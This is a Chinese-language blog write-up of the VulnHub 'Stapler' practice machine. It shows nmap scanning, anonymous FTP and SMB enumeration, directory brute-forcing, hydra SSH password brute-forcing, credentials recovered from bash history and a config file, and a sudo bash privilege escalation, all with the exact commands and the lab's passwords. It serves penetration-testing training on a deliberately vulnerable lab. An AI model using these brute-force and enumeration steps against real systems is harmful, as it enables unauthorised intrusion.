技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

vulnhub靶场之stapler靶机

 收录于 Oscp
   约 1430 字   预计阅读 3 分钟 
https://bing.ee123.net/img/rand?artid=146286939

vulnhub靶场之stapler靶机

前言

靶机: stapler 靶机,IP地址为 192.168.10.12

攻击: kali ,IP地址为 192.168.10.6

靶机采用 virtualbox ,攻击机采用 VMware 虚拟机,都采用桥接网卡模式

文章涉及的靶机及工具,都可以自行访问官网或者项目地址进行获取,或者通过网盘链接下载 https://pan.quark.cn/s/ee513814fee2

主机发现

也就是相当于现实环境中去发现确定主机的 ip 地址,因为这里是靶机环境,所以跳过了从域名到 ip 地址的过程。

使用 arp-scan -l 或者 netdiscovery -r 192.168.10.1/24

当然也可以使用 nmap 等工具进行

netdiscover -r 192.168.10.1/24

https://i-blog.csdnimg.cn/img_convert/5f7fe19c9aaad781c87232e0572ca587.jpeg

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的 tcp 端口的开放情况

nmap -sT --min-rate=1000 192.168.10.12 -p- -oA nmap-tcp

https://i-blog.csdnimg.cn/img_convert/cdf6be23f0d3c67d6b983b018a8f71fd.jpeg

再扫描 udp 端口的开放情况

nmap -sU --min-rate=1000 192.168.10.12 --top-ports 20 -oA nmap-udp

https://i-blog.csdnimg.cn/img_convert/114771b966aefa2a1f44d19f20c0c731.jpeg

可以看到明确开放的 udp 端口没有,所以下面对 tcp 端口进行一个筛选

ports=`grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

https://i-blog.csdnimg.cn/img_convert/9d7c30f2dcf6d4291d280e28b6e7a2e3.jpeg

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.12 -p $ports --min-rate=1000 -oA detail

https://i-blog.csdnimg.cn/img_convert/46ae5616d28150f8c6d9874118002f6d.jpeg

https://i-blog.csdnimg.cn/img_convert/8196d15c4e676117f464654ac2479ac1.jpeg

https://i-blog.csdnimg.cn/img_convert/53a284b456bcacf5070b207ced9b9ffc.jpeg

https://i-blog.csdnimg.cn/img_convert/3504f3f12662ee84d0f28c3cf3674a7c.jpeg

再使用 nmap 的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

https://i-blog.csdnimg.cn/img_convert/c39ac69c91083bbe2842514643fc10d8.jpeg

https://i-blog.csdnimg.cn/img_convert/af586302a2e11a34e2916c0e70c48a3c.jpeg

信息小结:

端口服务版本
21ftpvsftpd 2.0.8
22sshopenssh 7.2p2
53domaindnsmasq 2.75
80httpphp cli server 5.5
139sambasmbd
666
3306mysqlmysql 5.7.12
12380httpapache httpd 2.4.18

FTP信息探测

使用 anonymous 匿名空密码登录

ftp anonymous@192.168.10.12
ls -la
get note

https://i-blog.csdnimg.cn/img_convert/17954617fdecee1dbe35e9ec702ca720.jpeg

查看 note ,又有发现

https://i-blog.csdnimg.cn/img_convert/6bf1a4a7162d62086e4b7bd4676415b9.jpeg

信息小结,获取三个用户名

harry
elly
john

SMB探测

使用 enum4linux 探测服务

enum4linux 192.168.10.12 -a

可以看到有几个共享

https://i-blog.csdnimg.cn/img_convert/08bdfeddd65512ba710ada3fd49b0aa2.jpeg

以及一堆用户名

https://i-blog.csdnimg.cn/img_convert/7ced5e020bfaca38cdf6391d9c55c44a.jpeg

或者使用 nmap 的脚本进行探测

nmap --script=smb* 192.168.10.12

共享出的一样,只是这里明确列举出了共享中的文件

https://i-blog.csdnimg.cn/img_convert/4e1463798ae4a6ecbc7f8f97a7d4f89d.jpeg

使用 smbclient 查看或者连接也行

smbclient -L //192.168.10.12

https://i-blog.csdnimg.cn/img_convert/01d59ffab2418c1580aa49b26303adff.jpeg

使用 smbclient 连接 kathy 共享

smbclient //192.168.10.12/kathy -N

smb: \> prompt		#关闭交互
smb: \> recurse		#开启递归
smb: \> mget *		#下载所有

https://i-blog.csdnimg.cn/img_convert/42fe08676be65696d0e355e14fe46875.jpeg

再连接 tmp 共享,下载所有文件

smbclient //192.168.10.12/tmp -N

smb: \> prompt		#关闭交互
smb: \> recurse		#开启递归
smb: \> mget *		#下载所有

查看文件构造,发现一个压缩包,一个 txt 文件

https://i-blog.csdnimg.cn/img_convert/48148f18a020c96abbc1c68e0fa6ba19.jpeg

查看相关文件,发现一个用户名 kathy ,以及 wordpress 的备份文件

#解压文件
tar -zxf wordpress-4.tar.gz

https://i-blog.csdnimg.cn/img_convert/38ee76ca8b42a032faf433098f31ae26.jpeg

不过查看了很久,并没有发现连接数据库的配置文件

查看 ls 文件,发现只是一种记录

https://i-blog.csdnimg.cn/img_convert/8353aa9feacb7b8bf14a6895ff60dbbc.jpeg

信息小结:

获取众多用户名,把前面获取的用户名都放在一起,做成字典

peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
kathy
harry
john

网站信息探测

访问80端口的网站

并没有发现东西,并且页面源代码也没有内容

https://i-blog.csdnimg.cn/img_convert/60e2c905e45d4166b37b823cbe7be022.jpeg

使用 gobuster 等工具进行目录爆破

gobuster dir -u http://192.168.10.12 -w /usr/share/wordlists/dirb/big.txt -b 404 -x php,html,txt,md

https://i-blog.csdnimg.cn/img_convert/9541cb403e107f533b6dca33bf1185a7.jpeg

访问这两个发现直接下载,并且这两个文件,一般是在某个用户的主目录下的,猜测这个网站,可能就是以某个用户的主目录为网站目录的

在测试 .ssh/id_rsa 无果后,暂且搁置该网站

访问12380网站

可以看到,主界面没有任何内容,并且页面源代码中也没有内容

https://i-blog.csdnimg.cn/img_convert/0297ae7d1a75a75513893d05bf62931a.jpeg

使用 dirb 进行网站扫描,没有出现任何内容

dirb http://192.168.10.12:12380

https://i-blog.csdnimg.cn/img_convert/4aaf7bad8a2e39d619f2b4363d748a11.jpeg

密码爆破

目前只有大量的用户名,并没有其他东西,以之前整理后的 user ,进行密码爆破

hydra -L username -P /usr/share/wordlists/fasttrack.txt 192.168.10.12 ssh

https://i-blog.csdnimg.cn/img_convert/601ab5aeee4bdb453ee7ac54207ea637.jpeg

爆破出三个,随便以这用户进行登录,发现基本上没有什么内容,并且用户众多

https://i-blog.csdnimg.cn/img_convert/1531c4bf3949b31b981f4996de05c085.jpeg

一个个访问这些目录,只有在 JKanode 用户的目录下,发现命令历史记录中具有信息

https://i-blog.csdnimg.cn/img_convert/3bc4060c7b65f41441fb9cbab3672bcf.jpeg

sshpass -p thisimypassword ssh JKanode@localhost
sshpass -p JZQuyIN5 peter@localhost

经测试,上面这两个可以作为ssh登录,这里开始整理信息

用户名密码
MFreiletmein
CJoosummer2017
Drewqwerty
JKanodethisimypassword
peterJZQuyIN5

这里查看网站,发现在 /var/www/https/blogblog/wp-config.php 的配置文件,有连接数据库的配置

https://i-blog.csdnimg.cn/img_convert/b20ffe9b56225b51a4e5127cc58b2935.jpeg

发现密码 plbkac ,并且连接数据库的是以 root 执行的

查看 wordpress 数据库,发现其中的一些用户,不过都是加密处理的,不知道其算法

https://i-blog.csdnimg.cn/img_convert/debc5b07ae8707b232731a3ad26d9357.jpeg

提权

这里可能存在 mysql udf 提权,但是这里测试发现,不想,因为 mysql 版本大于 5.0 ,并且插件的所在路径对于非 root 用户没有写入权限,所以无法提权

https://i-blog.csdnimg.cn/img_convert/75d388b806cbc1b1f4ec249163253fa1.jpeg

从前面所有用户下手,并且使用 find 寻找具有SUID权限的文件

https://i-blog.csdnimg.cn/img_convert/9ab106643ee9c15591de64e27f38edd7.jpeg

不过最终只有在 peter 用户不一样,登录界面就不同

https://i-blog.csdnimg.cn/img_convert/3c2ae4efa660d47c05de9cd1ca2f96f4.jpeg

peter 使用 sudo -l 发现完全 ok

https://i-blog.csdnimg.cn/img_convert/f2d0bed999c8698d3b6677b8c84f819d.jpeg

直接 sudo /bin/bash -p 提权

https://i-blog.csdnimg.cn/img_convert/10bb826195650a6f636d59f87345080e.jpeg

查看最终 flag

https://i-blog.csdnimg.cn/img_convert/74b09b984550efbf691745a825ea2ecb.jpeg

总结

该靶机主要就是枚举,枚举,枚举!!!!

  1. FTP服务的匿名探测
  2. SMB服务的用户名枚举
  3. SSH服务的暴力破解
  4. 靶机内信息收集,找到的密码
  5. 最终提权,就是不同用户直接的切换
更新于 2025-03-15
 网络安全网络安全学习Web
返回 | 主页